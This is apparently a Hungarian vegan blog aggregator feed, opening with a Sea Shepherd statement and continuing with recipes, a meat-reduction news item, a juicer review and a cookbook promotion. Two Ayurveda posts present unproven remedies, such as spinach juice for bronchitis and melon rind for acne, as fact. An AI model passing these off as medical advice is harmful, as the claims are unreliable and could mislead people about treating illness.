Mi első kézből ismerjük és tapasztaltuk ezt a fajta korrupciót és a legtöbb országban a legmagasabb szintekig ér el.
A Sea Shepherd nem volt jelen a Washington D.C-ben rendezett konferencián - ,,ez nem egy olyan tárgyalás volt ahol kalózokat fogadnának - közölték, ami végtére is érthető. Amúgy sem vagyunk nagy hívei a konferenciáknak.
Nem konferenciákra van szükségünk, hanem tettekre. Vannak hajóink. Vannak önkénteseink, és ami a legfontosabb, meg van a bátorságunk, a képzeletünk és a szenvedélyünk, hogy változtassunk.
Az elkövetkező évre, Sea Shepherd folytatja beavatkozásait az illegális tevékenységek ellen az egész bolygón, hajókkal és legénységgel az Atlanti-, Csendes-, Déli- és az Indiai-óceánon, valamint a Földközi-tengeren.
Jövőre lesz 40 éve, hogy létrehoztam a Sea Sheperdet, az orvvadászat és orvhalászat elleni szervezetet. A meglévő erőforrásainkkal a törvények és gyakorlatiasság keretein belül tevékenykedünk.
Taktikáink lehetnek néha vitathatóak, de mindenesetre bizonyítottan sikeresek. Úgy érünk el eredményeket, hogy nem okozunk sérüléseket. Leállítjuk az illegális tevékenységeket és életeket mentünk, miközben a tengeri rezervátumok integritását védelmezzük.
Nem zavar, ha vitathatóak vagyunk. Szeretem magunkat a tengeri természetvédő mozgalom ,,éjszakai hölgyeinek hívni magunkat. Sok ember ért velünk egyet titokban, de inkább nem mutatkoznának velünk a nappali világosságban. És ez így rendben is van, mert egy mozgalom ereje a sokféleségében rejlik.
Mégis évről évre egyre több nyílt támogatás kapunk, ahogy az emberek látják, ahogy az előrejelzéseink beteljesülnek és látják az eredményeit is beavatkozásainknak.
Tavaly, az USA külügyminisztere, John Kerry és az Interpol hálásak voltak a Sea Sheperdnek amiért felszámoltuk a Déli-óceáni sügér orvhalászokat.
Biztatás és támogatás érkezett még Ecuador, Gabon, Indonézia kormányától; az olasz, hondurasi, francia rendőrségtől; és Mexikó elnökétől.
Ebben a pillanatban több mint 100 önkéntesünk van a tengeren 9 különböző hajón. Önkénteseink vannak Costa Ricában, Hondurason, Floridában, Japánban és a dán Feröer-szigeteken.
40 évnyi agresszív, de erőszakmentes taktikánk - mely során egyetlen sérülést sem okoztunk - sikeresnek bizonyult!
A Sea Shepherd egy növekvő globális mozgalom és hálások vagyunk azon nemzeteknek, akik részt vettek a Washingtoni konferencián, amelyen növelték a védett zónákat, ezzel növelve pár fokkal számunkra a felhatalmazásunkat, hogy megállítsuk a bűnözőket, akik továbbra is kizsákmányolják óceánjainkat, anélkül, hogy a természet törvényeit és humán társadalom törvényeit figyelembe vennék!”
Csatlakozzatok a Sea Shepherd facebook közösségeihez, hogy első kézből értesüljetek a világ óceánjainak élővilágát érintő kérdésekről, a Sea Shepherd egyedülálló munkásságáról és Paul Watson kapitány elgondolkodtató és olykor szórakoztató kommentjeiről:
Sea Shepherd Hungary
Sea Shepherd
Paul Watson
Óceánok konferenciája weboldal
Fotók:
Cliff Owen./AP
http://ourocean2016.org/#event
Kovászos uborka (vegán, gluténmentes)
2016. szeptember 20. Zizi kalandjai
Igen, jól olvastátok a címet… szeptember közepén ősziesre forduló időben kovászos uborka receptet osztok meg itt a blogon! Nem akármilyet! Anyukám kovászos uborkáját, aminek a végeredménye: ropogós savanykás uborkák, tiszta lé – ami azonnal iható, mert nincs szükség átszűrésre! Nyáron többször csináltuk, csak sajnos most jutottam el oda, hogy megosszam a receptet. Mentsétek el, mert ha idén már nem is lesz lehetőség koviubi készítésére, jövőre feltétlen próbáljátok ki!
Anyukám kenyér helyett burgonyát tesz bele, így nincsen szétmáló, szétmorzsolódó kenyér benne, ami miatt a végén át kellene szűrni a levét. Dob mellé még néhány fokhagymagerezdet, kerül bele kapor és só, valamint víz és utána a napsütés és a meleg elvégzi a dolgát.
De mi történik a méltán népszerű koviubi készítése során? Erjedés vagy más néven fermentáció, ami az emberiség egyik legősibb tartósítási módszere. Mit is jelent ez? “Az erjedés vagy erjesztés, idegen szóval fermentálás vagy fermentáció olyan kémiai folyamat, amelyben valamilyen szerves anyagot egy enzim hatásának teszünk ki. Szénhidrátok lebontását jelenti, amelyet mikroorganizmusok (élesztők, penészek, baktériumok) végeznek, hogy saját élettevékenységükhöz energiát termeljenek. Az energia a fotoszintézissel megkötött napenergiából származik, mert a növényekben az energiatárolás zömmel szénhidrátokban történik.” (Forrás: wiki). A többféle erjedés fajta közül a koviubi készítése során tejsavas erjedés történik, amit tejsavbaktériumok okoznak. Nagyon pontos, precíz írást olvashattok a témában Kísérleti Konyha blogján.
Kovászos uborka (vegán, gluténmentes)
Hozzávalók 5 literes üveghez:
– 2,5 kg uborka (közepes méretűek), keresztben és hosszában bemetszve
– 2 db közepes burgonya, meghámozva, félbe vagy negyedbe vágva
– 4-6 gerezd fokhagyma, meghámozva
– 1-2 csokor kapor, megmosva
– só
– víz
Az uborkákat jól mossuk meg, az üveget jól tisztítsuk ki.
Tegyük az üveg aljára a megmosott kaprot. Kezdjük el egymásra tenni a bemetszett uborkákat, helyezzük közéjük a fokhagymagerezdeket és a burgonya darabokat. Ha feltöltöttük az üveget, jöhet a folyadék. Minden liter hideg csapvízhez 2 púpos evőkanál sót tegyünk, amit keverjünk el úgy, hogy a só feloldódjon a vízben. Ehhez az üveghez 2,5 liter vízben oldjunk fel 5 evőkanál sót. Öntsük rá az uborkára, tegyünk rá egy tányért fedélnek és tegyük ki napra, melegre megérni. Két-három nap után elkészül és fogyasztható, nem kell átszűrni.
Az uborkákat tegyük egy lábasba a folyadékkal együtt és tartsuk hűtőben (lefedve). A fokhagymagerezdeket megehetjük salátára szelve.
**********
2016 októberében megjelenő Vegán Reggeli című szakácskönyvem még mindig 25%-os kedvezménnyel rendelhető meg! Remélem ti is annyira várjátok, mint én! Részletekért katt a képre!
Zöldséges quinoa-val töltött gombafejek
Ezt a receptet azért is írom le és osztom meg, mert legutóbbi magyarországi látogatásunk alkalmával néhány embernek quinoa-t vittem ajándékba. Itt több helyen kapható, s amint korábban írtam a Grape Tree nevü üzlet (egyik kedvenc boltom) jobb áron kínálja, mint Magyarországon bárhol láttam eddig. Ha már Angliában nincs TV paprika, se igazi besztercei szilva, meggyet idén itt nem is ettem, akkor legalább quinoa-t olcsóbban kapok. Ha a quinoa első készítéskor kesernyés ízű, következő alkalommal áztassuk pár percig hideg vízben, vagy mossuk át. Én nem szoktam mosni, s nem is érzem kesernyésnek. Igazából egy jó fűszerezéssel és zöldséggel igazán finom étel lesz belőle. Ráadásul nem hízlal. Fehérjében viszont gazdag. Több fehérje van benne, mint a búzában vagy a kölesben. Gluténmentes gabona.
A recept
Hozzávalók:
- néhány fej gomba (jelen esetben 15-16 közepes méretű)
- kb 2 dl bögrényi mirellit zöldborsó
- 1-2 paprika
- vegán sajt / sörélesztő pehely / füstölt tofu / lila hagyma
Elkészítés:
A gombákat megmossuk, törzsület kivágjuk, felaprítjuk, megsózzuk, enyhén megpároljuk. A gombafejeket egy tepsibe helyezzük, enyhén megsózzuk őket. A zöldborsót és paprikát szintén enyhén megsózva megpároljuk. A quinoa-t enyhén sós vízben puhára főzzük. A víz ellepje, de nem kell kétszeres mennyiségű víz. A zöldségeket összekeverjük a megfőtt quinoa-val, ételízesítővel picit megszórjuk, ha nem elég ízes, majd a gombafejeket megtöltjük. Vegán sajtot reszelünk a tetejére, ha nincs, füstölt tofu szeleteket teszünk rá, ha az sincs, lila hagyma-karikákat helyezünk a gombákra vagy sörélesztő pehellyel megszórjuk a töltelék tetejét. Kb. 20 perc alatt megsütjük őket.
A quinoa-t édesen is elkészítheted. Íme néhány édes és sós recept, amiket kedvedre, ízedre át is alakíthatsz:
Málnás-brazil diós quinoa
Erdei gyümölcsös quinoa
Fokhagymás sült patiszon quinoa-val (patiszon helyett cukkinit is használhatsz!)
Európának a felére kell csökkentenie a marhahús-fogyasztását, ha tartani akarja magát a klímaváltozási célokhoz
2016. szeptember 13. VegaNinja
Az Európai Unió minden tagállama feltételezhetően megköt egy egyezményt, amiben a tagországok garantálják, hogy 2050-re felére csökkentik a metán- és nitrogén-oxid-kibocsájtásukat. A tervezet végrehajtása hatalmas változásokat igényel, amiket egyelőre köd borít. Egy svéd egyetem friss kutatása a következő ajánlást teszi: “az EU-nak nem kevesebb, mint 50%-kal csökkentenie kell a lábasjószág fogyasztását, hogy 2050-re elérje a fentebb említett célt.” A kutatás vezetője, Dr. David Bryngelsson úgy véli, hogy a húsfogyasztás redukálása lényegesen jelentősebb feltétele a kitűzött cél elérésének, mint például a háztartási hulladék csökkentése. A tanulmány továbbá állítja, hogy ha az európaiak tényleg komolyan gondolják a gázkibocsájtás csökkentését, akkor a marha- és birkahús fogyasztásában alkalmazandó megszorítás elengedhetetlen. A kutatók hat különböző forgatókönyvet vettek figyelembe, és mindegyik esetben azt találták, hogy ez a beavatkozás – ami persze igen szélsőséges étrendi változtatást követel – az egyetlen járható út a mérgező gázok terjedésének megfékezéséhez. Ugyanekkor az EU az úgynevezett Platform on Food Losses and Food Waste nevű kampánnyal igyekszik visszaszorítani az ételpazarlást, de Bryngelsson-ék azt mondják, még ha a kampány el is éri a kitűzött célt, ez a gázkibocsájtásban akkor is mindössze 1-3%-os visszaesést fog eredményezni. Röviden, a húsfogyasztás mérséklésének lényegesen hatásosabb eredményei lennének. Az nem teljesen tiszta, hogy a kutatók számoltak -e a Brexit hatásaival. Az “Article 50” útnak indítása – a brit leválás hivatalos kezdete – beható változásokat eredményezhet a Britek klímapolitikájában. A brit kormány sajtósa ugyanakkor úgy nyilatkozott, hogy a szigeten folytatódnak az EU, levegővel kapcsolatos törekvései. Ha a kutatóknak igazuk van, a klímaváltozás nem feltartóztatható, hacsak nem az egész világ összefog, és együtt, hathatósan csökkentik a húsfogyasztást. Forrás: vice.com Fordítás: Biró György The post Európának a felére kell csökkentenie a marhahús-fogyasztását, ha tartani akarja magát a klímaváltozási célokhoz appeared first on VegaNinja.
Csokis-meggyes kölestorta
2016. szeptember 9. Éltető ételek
A facebook csoportomban "mindenmentes" torta receptről beszélgettünk, amikor eszembe jutott ez a kölessüti. Viszont volt vele egy kis gond, ugyanis és tortaformában szerettem volna megsütni, de amikor beleöntöttem a folyadékot, abból az kifolyt. Ezért újratervezés következett és ez lett belőle. Az egész családnak ízlett, még a párom is elismerően bólogatott. Akár 1 éves szülinapra is tökéletes ez a torta, mivel hozzáadott cukrot nem tartalmaz, glutén-, tojás- és tejmentes is. A tészta állaga nem a megszokott piskóta, mivel a köles nincs megdarálva, ezért sokkal krémesebb és lágyabb. De ennek ellenére szeletelhető volt. A torta széle kissé lilás lett, szerintem a meggy miatt. :) Hozzávalók: - 1 csésze köles - 3 csésze növényi tej (pl. kókusz-, vag mandulatej) - késhegynyi vaníliapor - 1 banán - 6 datolya - meggy(befőtt) - 1-2 evőkanál kakaópor - 1 teáskanál szódabikarbóna - 1 evőkanál bio vaj vagy kókuszolaj Krém: - 20 dkg puha datolya - 2 evőkanál chiamag - 1-2 evőkanál kakaópor - 8-10 csepp narancsolaj Díszítés: bármilyen szezonális gyümölcs Elkészítése: 2 csésze tejet tegyünk fel főni. Szórjuk bele a kölest és a vaníliaport, majd lefedve kb. 12 perc alatt főzzük puhára.A megmaradt 1 csésze tejbe áztassuk be a datolyát, majd tegyük bele a banánt is. Botmixerezzük össze. Ezt az édes, banános tejet öntsük rá a megfőtt kölesre.Lazán forgassuk össze, majd szórjuk bele a kakaóport és a szódabikarbónát. Keverjük hozzá a puha vajat is.Öntsük bele a tortaformába, majd bőségesen szórjuk meg a kimagozott meggyel. Kissé bele is keverhetjük. (Ha lazább sütit szeretnél, akkor tegyél bele 2 felvert tojásfehérjét).Előmelegített sütőben (180fok), kb. 30 perc alatt süssük meg. Közben készítsük el a krémet. A puha datolyát daraboljuk fel, és áztassuk be annyi vízbe vagy növényi tejbe, amennyi éppen ellepi. Kb. 1-2 óra elteltével botmixerezzük simára. Keverjük hozzá a kakaóport, a chiamagot és a narancsolajat. Akár vaníliapor is kerülhet bele.Simítsuk rá a tortára, és legalább 3-4 órát hagyjuk állni. Ezidő alatt teljesen kihűl, és a krém is megszilárdul.A tetejét díszítsük gyümölccsel.
Bébipapi - Kakukkfüves édesburgonya
Nem recept, de emlékeztetőnek jó, mikor az ember töri a fejét, hogy mivel lehetne változatosabbá tenni egy 8 hónapos manó étrendjét. Felnőtt "gyors és könnyű" menüben is el tudom képzelni, csak akkor egy kis oliva olajon megpirítva és picit sózva. Mellé valami saláta és mondjuk tökmag fasírt kínálható. Most úgy készítettem, hogy egy fél édesburgonyát megtisztítottam, felkockáztam, és kevés vízzel egy kerámia serpenyőben puhára pároltam. A végén adtam hozzá kevés oliva olajat és egy csipet kakukkfüvet. Ha kicsit nagyobb a kölyök, akár egészben is maradhat az édesburgonya, és elcsipegetheti, de nálunk még nem. Amit a kisasszony a kezébe kaparint, azt szétnyomja a tenyerében, kétoldalt leesik a kaja, a maradékot megpróbálja begyömöszölni, de a lényeg már az etetőszéken, és környékén... Hja, az élet sava, borsa. :)
A spenót hatásai és ájurvédikus alkalmazása
2016. szeptember 5. Élj harmóniában
A spenótról Popeye óta tudja mindenki, hogy életerő, egészség:) A spenótban számos vitamin és nyomelem található. Gazdag vasban, klorofillban, folsavban, béta karotinban, magnéziumban, A és C vitaminban. Található benne kálium, kalcium, K vitamin. A spenótnak magas a rosttartalma is, ami segít a beleket tisztán tartani. Fogyaszthatod nyersen és főzve is. Nyersen kitűnő salátának és főzve, párolva, levesként vagy főzeléknek is szokták fogyasztani. Az ájurvédában számos spenótos recept létezik. A nyers spenót az ájurvédában fanyar és enyhén csípős, hatásait tekintve édes, hűsítő és csípős utóhatással rendelkezik. A főtt spenót fanyar, savanyú melegítő hatású és édes utóhatással rendelkezik. Hashajtó hatása van és nehéz emészteni. A spenótot veseköves vagy epeköves állapotban nem szabad fogyasztani. Néhány ájurvédikus alkalmazási mód: A spenót levét alkalmazhatod a bőrödön, ahol valamilyen duzzanat van. Segít a duzzanatot lehúzni. Amennyiben hörghurutod van, enyhítheted a tüneteket azáltal, hogy naponta két alkalommal 1/3 csésze spenótlevet egy csipet pippalival (hosszú borssal) megiszol. Krónikus köhögésre, igyál naponta kétszer üres gyomorra 1/2 csésze spenót levest, 1/4 tk gyömbérrel. Vegyszermentes (bio) spenótot fogyassz. A blogon nemsokára közzé teszek néhány ájurvédikus spenótos receptet is. :) felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Kókuszvíz jégkrém gyümölcsökkel (vegán)
2016. szeptember 1. Zizi kalandjai
Helló szeptember! Hát eltelt a nyár, vagyis remélhetőleg van/lesz vénasszonyok nyara, de a vakációnak vége. Örülök a változásnak, de ilyenkor mindig sajnálom, hogy kevés sárgabarackot és áfonyát ettem, és jön az alma időszak, amit unásig lehet fogyasztani, míg lesz végre újra eper. Na és persze rövidülnek a nappalok, jön a korai sötétség. Novemberben már a karácsonyt várom, hogy elkezdjenek újra hosszabbodni a napok. De persze élvezem, élvezzük a MOSTot közben!
Az idei nyarunk sok munkával, néhány vakációval és két gyerek nevelésével telt – ami szintén munka 24 órában! Nyáron az egyszerűség és a gyorsaság volt a lényeg a konyhában, hogy minél gyorsabban készítsek valami finomat, ne kelljen a tűzhely mellett állni sokáig. A blogra szinte alig fotóztam ételt, azért van két dolog, amik nyáriak, és még megosztom veletek, hátha elkészítitek vagy elmentitek jövőre!
Az első ez a jégkrém, aminek nincsenek pontos mértékegységű hozzávalói, mert függ attól, hogy kinek, milyen jégkrém formája van. Szóval a hozzávalókat megadom, de mértékegységek nincsenek hozzá. Az egész alapja a kókuszvíz, amely az éretlen zöld kókuszdió magjában található folyadék. Számos ásványi anyag és nyomelem megtalálható benne, úgy, mint cink, kálcium, kálium, magnézium és vas. Kiváló lúgosító hatással rendelkezik és sportolók izotóniás italként is fogyasztják. Immunerősítő és kismamáknak, szoptatós anyáknak természetes ásványpótlást biztosít (még többet a kókuszvízről itt). Figyeljünk arra, hogy tiszta kókuszvizet vegyünk, amiben lehetőleg nincsen édesítőszer és más oda nem illő anyag. Mi az egyik szupermarket láncolat ázsiai hetének keretében vettünk két kartonnal! Reggeli smoothiekba tesszük vagy csak behűtve ittuk nyáron.
Előny, hogy a kókuszvíz miatt átlátszó a jégkrém, így látszódnak benne a gyümölcsök!
Kókuszvíz jégkrém gyümölcsökkel (vegán)
Hozzávalók:
– kókuszvíz
– juharszirup/agavészirup (opcionális)
– friss szezonális gyümölcsök, ha valami nagyobb (pl. kivi), akkor kisebb darabokra vágva – én epret, áfonyát és kivit használtam
Lehetőleg álló jégkrém formát használjunk. Ha édesíteni szeretnénk, akkor egy tálban keverjük össze a kókuszvizet az ízlés szerinti juharsziruppal (ez a lépés kihagyható, ha nem édesítjük), öntsük a formákba és dobáljunk bele néhány gyümölcsöt, helyezzünk mindegyikbe pálcikát. Tegyük a fagyasztóba legalább két órára, amíg megszilárdulnak.
Tipp : fekvő jégkrém forma esetén csak félig öntsük fel a formákat, tegyük bele a gyümölcsöket és a pálcikákat. Helyezzük a fagyasztóba és ha megfagyott, akkor öntsünk hozzá még egy kevés kókuszvizet, majd újra fagyasszuk meg. Minderre azért van szükség, mert a formáknak van egy apró lyuka, amin a pálcikát lehet beszúrni és ha teljesen felöntjük a formát a kókuszvízzel, akkor a lyukon keresztül kifolyik belőle (tudom, saját tapasztalat )!
Sana EUJ 707 lényerő gép tesztelése
2016. augusztus 24. Gitta nyersétel blogja
Egy újabb présgép van tesztelés alatt! Kinézetre gyönyörű... szétszedése, összerakása álom, egyértelmű, összeillik, rásimul :) imádom. Elfér a konyhapulton, mert nem magas (cserébe széles, így minden alkalommal visszakerül a dobozba használat után), mosogatása gyors, egyszerű... képzeljétek a szűrő része annyira pici, csupán pár négyzetcentiméter, így ez a rész nagyban leegyszerűsödött. Akinek van gyümölcscentrifugája vagy hasonló présgépe, az tudja, hogy a szűrőt a legmacerásabb kitisztítani. Általában kell hozzá célszerszám, amit vagy adnak a géphez, vagy egy fogkefe is alkalmas, amivel az apró lyukakból kivarázsoljuk a beleragadt növényi rostokat. No ez itt nagyon kényelmes. A másik fontos szempont a kinyert lé íze. No itt az is nagyon pozitív, ezt nem is hittem volna. A gyümölcscentrifugával összehasonlítva sokkal de sokkal finomabb, selymesebb ízű lé keletkezett... Egyik alkalommal egy nektarin is belekerült a gépbe, lehet, hogy ettől, de kicsit olyan zselés lett a lé, egészen különleges :) A lényerés hatásfoka is elfogadható, sőt nagyon jó. 1 kg zöldségből 7,1 dl, és 1 kg gyümölcsből pedig 7,3 dl lét sikerült kipréselni. Tudom, ez attól is függ, hogy milyen gyümölcsökről vagy zöldségekről van szó, de ez úgy átlagban akkor is egy jó arány. Gyümölcscentrifugánál ez a szám 5 és 6 között van... És most jöjjenek az árnyoldalak... Nagy szomorúságom a betöltő nyílás... ami igen pici. Nagyon pici. Na nem ránézésre, vagy esztétikailag, hanem a feldolgozandó zöldségek, gyümölcsök méretét tekintve, azokat egészen apróra kell feldarabolni, felvágni, hogy be lehessen tölteni őket a gépbe. :( Ez sok időt vesz el a konyhában, ami megspórolható lenne. A másik nagy bánatom szintén idővel kapcsolatos... hát a sebessége... Tudom, hogy ez egy lassú présgép, na de ennyire? Persze, ha van türelmünk kivárni, akkor csodás eredményt produkál, de abba bele sem merek gondolni, hogy ha elkezdődik az iskola, akkor a reggeli készülődésbe hogyan fog beleférni ez a plusz idő... :( De igen: korábban kell felkelni. Sárgarépa, cékla, tök, zöld levelek: nagyon rendben. A puhább gyümölcsökkel nehezebben bánik, nálam habosodott, pürésedett és a végén már nehezen ment a barack, ananász, és a puhább alma... (ez azt jelenti, hogy lelassult a folyamat, a habos cucc megállt a csőben, és csak csöpögött a tálba. Otthagytam, mást csináltam, míg szépen lassan lefolyt. Íze csodás lett) Egy jó kis videó, szép színes italokkal:
Csokikrémes-gyümölcsös tejberizs
2016. augusztus 19. Éltető ételek
Gyakran készítek tejberizst, amelyet mindig más és más gyümölccsel vagy krémmel egészítek ki. Többnyire rizottórizst használok, amellyel sokkal krémesebb lesz az eredmény. A csokikrém egy egyszerű datolyakrém, a gyümölcs pedig a kedvünk és a szezonalitás alapján bátran variálható. Hozzávalók (4 adag) - 1 csésze rizottórizs - 3 csésze rizstej - 1/2 mokkáskanál vaníliapor - 1 evőkanál datolyakrém - csipet só Csokikrém: - 20 dkg puha, bio datolya - 2-3 dl kókusztej - 2-3 evőkanál chiamag - 1-2 evőkanál kakaópor - 6-8 csepp narancsolaj Morzsa: - 2-3 evőkanál kókuszreszelék - 2-3 evőkanál apróra tört dió - késhegynyi vaníliapor - 2-3 evőkanál szárított hajdinacsíra Gyümölcs kedvünk és ízlésünk szerint, én most őszibarackot használtam Elkészítése: Először a datolyát készítsük el, mert a teljes felpuhulásához idő kell. Vágjuk fel kis darabokra és annyi vizet öntsünk rá, amennyi éppen ellepi. Hagyjuk állni 1-2 órát.A rizstejet tegyük fel főzni, majd szórjuk bele a rizst. Kb. 25 perc alatt megfő, időnként keverjük át. A vaníliaport is tegyük bele, a datolyakrémet pedig csak a végén.A megpuhult datolyát botmixerezzük össze, adjunk hozzá a tejet, a kakaóport és a narancsolajat. Végén keverjük bele a chiamagot.Összeállítása: - A pohár aljára tegyük az apró kockára vágott gyümölcsöket. - Kanalazzuk rá a tejberizst. - Szórjuk meg morzsával. - Simítsuk rá a csokikrémet. - A tetejére tegyünk a megmaradt gyümölcsből.A datolyakrém egy természetes édesítőszer. Egy csomag datolyát áztassuk be vízbe, majd néhány óra elteltével turmixoljuk össze. Üvegbe töltve, hűtőben 2-3 hétig eláll.
Vegán “tejfölös” mártogatós
2016. augusztus 15. Fittanyuka
Nyári fogás amit egyszerű elkészíteni és minden ízében, színeiben nyár!
Nyári szabadságomat töltöm és a pihenés alatt igyekszem gyorsan elkészíthető, csupán néhány alapanyagos és mégis egészséges fogásokat készíteni!
A mai ebéd:
Steak édesburgonya hasábok (sütőben, nem olajban sütve), sült paprikával és sült fokhagymával, továbbá szójaszószban pácolt, majd grillezett tofu kockák, vegán “tejfölös” mártogatós és rusztikus, nyári saláta paradicsommal, uborkával, lilahagymával.
Elkészítése annyira egyszerű, hogy recept sem szükséges:)!
Az édesburgonyákat héjával együtt hasábokra vágtam, egy sütőpapírral kibélelt sütőlemezre tettem, néhány cikk fokhagyma és kápia paprika társaságában, meglocsoltam kevés olíva olajjal, sóztam és 200 C fokon pirosra sütöttem. A következő fűszerkeveréket készítettem neki: kevés parajdi só, piros paprika, őrölt kömény, kevés őrölt fekete bors, szárított rozmaring, majd ebben a keverékben hempergettem meg tálalás előtt.
A tofut olívaolajos, szójaszószos pácban pihentettem egy fél órát, bele préseltem egy cikk fokhagymát, majd kókusz olajon átpirítottam…
A vegán “tejfölös” mártogatós pedig így készült:
200 ml kókusztejszín
1 evőkanál jó minőségi mustár
só ízlés szerint
3-4 evőkanál hidegen sajtolt olíva olaj
3 evőkanál citromlé
1 cikk fokhagyma
csipet fehérbors
friss vagy szárított zöldfűszer: petrezselyem zöld, bazsalikom, vagy bármelyik kedvencünk.
A dinnye hatásai és ájurvédikus alkalmazása
2016. augusztus 11. Élj harmóniában
A dinnye szezon júliustól szeptember elejéig tart. Ezen időszakban kicsiny hazánk szinte minden roszágútja mellett dinnyeárusokkal találkozhatunk:) A dinnye egy ízletes, édes, hűsítő, lédús gyümölcs. Nagyon vizes, és az ájurvéda nehezen emészthetőnek tartja. Számos vitamint, ásványi anyagot tartalmaz - többek között A-, B- és C-vitamint, kalciumot, káliumot, magnéziumot és szelént. A legtöbb dinnye hasonló hatásokkal rendelkezik, elsősorban vízhajtó és afrodiziákum. A dinnye nyugtatja a Vatat és a Pittat, de provokálhatja a Kaphát. Kedvezően hat az emésztésre, segít tisztítani a beleket is. Leginkább Pitta rendellenességeknél tudod alkalmazni, mint gyulladásos állapotok, égető érzések. Néhány ájurvédikus alkalmazási mód: Ha valakinek túl sok a Pitta a szervezetében - sok az égető érzés a szervezetben - akkor a dinyne kiváló, emrt húsíti a szervezetet. Viszketés enyhítésére is kiváló a dinnye. Részben ilyenkor egyél dinnyét rendszeresen és a dinnye húsát dörzsöld a bőrödhöz. Akne esetén a dinnye héjának a belső oldalával dörzsöld át a bőröd és hagyd rajta éjszakára is. Ez a bőrt megszabadítja az akne-tól és puhává is teszi. Égető vizelet esetén, egyél dinnyét egy csipet koriander porral megszórva. Ez segít csökkenteni a gyulladást a húgyutakban és megszüntetni az égető érzést. Ínyvérzésnél , sokat segíthet ha eszel dinnyét, de nagyon lassan rágod. Vegyszermentes (bio) dinnyét fogyassz. felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Vegán kakaós protein palacsinta
Ha fogyni szeretnénk, vagy legalábbis nem hízni a szénhidrát mennyiséget csökkentsük, de így is élvezhetjük a finom ízeket, ráadásul tej,-laktóz és tojás nélkül. Az volt a cél, hogy mindenféle felesleges szénhidrát és zsír nélküli palacsintám legyen, amelyet gyorsan, akár reggel is előállíthatok.
Ez a palacsinta abszolut lisztmentes, gluténmentes és vegán, hozzáadott cukrot sem tartalmaz, rosttartalma viszont magas.
Hozzávalók: 4-5 db kisebb palacsinta
60 g ( 2 evőkanál) vegán kakaós fehérjepor: absorice
1 teáskanál kakaópor
csipet szódabikarbóna
2 dl rizstej
2 evőkanál kókuszliszt
1 evőkanál útifűmaghéj
édesítés ízlés szerint ( a fehérjepor elég édes, steviával van édesítve)
1 teáskanálnyi kókuszolaj
Az olajjal kikennjük a palacsinta vagy egy tapadásmentes sütőt. Az összetevőket összeturmixoljuk és kis adagokban, hasonlóan, mint az amerikai palacsintát kisütjük. Ha kis halmokat sütünk könnyebb megfordítani és nem esik szét. Tetszőleges gyümölccsel tálaljuk.
Mit eszik a Világ? Ha nem eszik... ÚJ! egészségtudatos vegetáriánus, vegán RECEPTKÖNYV a piacon
Körülbelül 1 évvel ezelőtt egy barátnőm apukája, akit akkor láttam életemben először, teljesen rezzenéstelen arccal megkérdezte tőlem, hogy miért nem írok könyvet? Én egyből kinevettem és különböző kifogások hosszas tárházát vonultattam fel pár perc alatt. De aztán ez az egyszerű, körítésmentes, és direkt kérdés befészkelte magát az agyamba. Biztosan ismeritek ezt az érzést. Nap, mint nap emberek sokaságától kapunk több száz kérdést, amire hol válaszolunk, hol nem. A kérdések jönnek-mennek. Aztán ritkán, de néha előfordul, hogy kapunk egy kérdést, ami velünk marad. Amit hazaviszünk a fejünkben. Amit többször megrágunk, megpróbálunk magunknak kimagyarázni, keressük a kifogásokat, de legbelül mélyen érezzük, hogy valamit elindított bennünk az a kérdés. A tagadásból hárítás lesz, majd megbékélés a gondolattal, ezután átkerül a "miért is ne?" kategóráiba, míg végül elfogadás és újabb terv lesz belőle! Egy egyszerűnek tűnő kérdés a semmiből, egy idegentől, ami végül megváltoztatja az életünket! :-) Most 1 évvel később büszkén és boldogan mutathatom be nektek a MIT ESZIK A VILÁG? Ha nem eszik... című könyvet. Életem első könyve, de annyira megszerettem közben az írást, és olyan sokmindent megtanultam magamról, hogy a "helyemen vagyok" érzés megtalált, úgyhogy fejben már készül a folytatás... Az eddigi visszajelzések alapján, ti is szívesen olvassátok soraimat, és készítitek el családotok számára a recepteket. Aki ismer, tudja, hogy két nagy szerelmem van (természetesen a férjem után), ami olyan tipikusan Szonjás. Az egyik a vendégvárás (finom ételek készítése másoknak), a másik az utazás. Bármikor bárhová! ;-) Ismerkedni a Világgal, az ismeretlen kultúrákkal, az idegen tájakkal, az új ételekkel és ízekkel. Felfedezni, tanulni, fejlődni! Amióta az eszemet tudom, minden szabadon elkölthető pénzemet utazásra fordítottam. Nem érdekelnek a drága ruhák, a márkás műszaki cikkek, nem gyűjtök az otthonomba felesleges tárgyakat, de annál több élményt és kalandot a Világ körül! Bármikor készen állok új országba költözni, hogy egy kis időre közelről szemlélhessem a helyi kultúrát és szokásokat. Már számtalan országban jártam, de még mindig úgy gondolom, Magyarország a legszebb ország. Csodálatos földrajzi fekvéssel és éghajlattal, rendkívül gazdag látnivalókkal és programlehetőségekkel, miközben finom, helyi zöldségekből és gyümölcsökből készült ételekkel táplálkozhatunk. Most egy kis ideig még Világot járunk, aztán egy nap majd erősebb, teljesebb és jobb emberként "haza" érek. Már tisztelni fogom azt, akit addig nem tiszteltem, és hálás leszek mindazért, ami előtte természetes volt. "A világ egy könyv, és akik nem utaznak, csak egy oldalt olvasnak belőle!" /Aurelius Augustinus/ Így tehát mi is lehetne más a könyv témája, mint az utazás és a finom ételek? ;-) Egészségtudatos receptek és izgalmas útikalandok várnak a könyv 284 oldalán keresztül. Mindezek mellett hasznos egészségmegőrző tippek és konyhai trükkök, TOP10 listák, interjúk, színes képek, rengeteg humoros köntösben tálalt inrformáció, és 170 vegetáriánus recept várja a kedves olvasót. A RECEPTEKRŐL, ALAPANYAGOKRÓL A receptek válogatásakor azt tartottam szem előtt, hogy minél többféle olyan alapanyagot betudjak mutatni nektek, melyek nem feltétlenül tartoznak egy hagyományos magyar konyha bevásárlólistájára, pedig ma már könnyedén elérhetőek egy-egy online webáruház, vagy nagyobb egészségtudatos szupermarket kínálatából, de a városi bioboltok polcain biztosan megtaláljuk. (Nagy szeretettel és lelkesedéssel ajánlom a magyar online webáruházakat, melyek nemcsak, hogy 24 órás nyitvatartással rendelkeznek, de még cipekednünk sem kell, hisz az ajtónkig szállítják a nehéz lisztet és cukrot.) Alapanyagok, melyek a természetben is megtalálhatóak és több millió ember fogyasztja őket nap, mint nap a Világ más-más pontjain, már több ezer éve. Ilyen például a rizs helyett fogyasztható szuperegészséges quinoa vagy hajdina. Az édesburgonya is egyre népszerűbb a magyar piacokon, és a tavaszi epres-rebarbarás sütemény költemények is egyre több konyhatündér számára kötelező ízkombináció. Nem is szeretném felsorolni azt 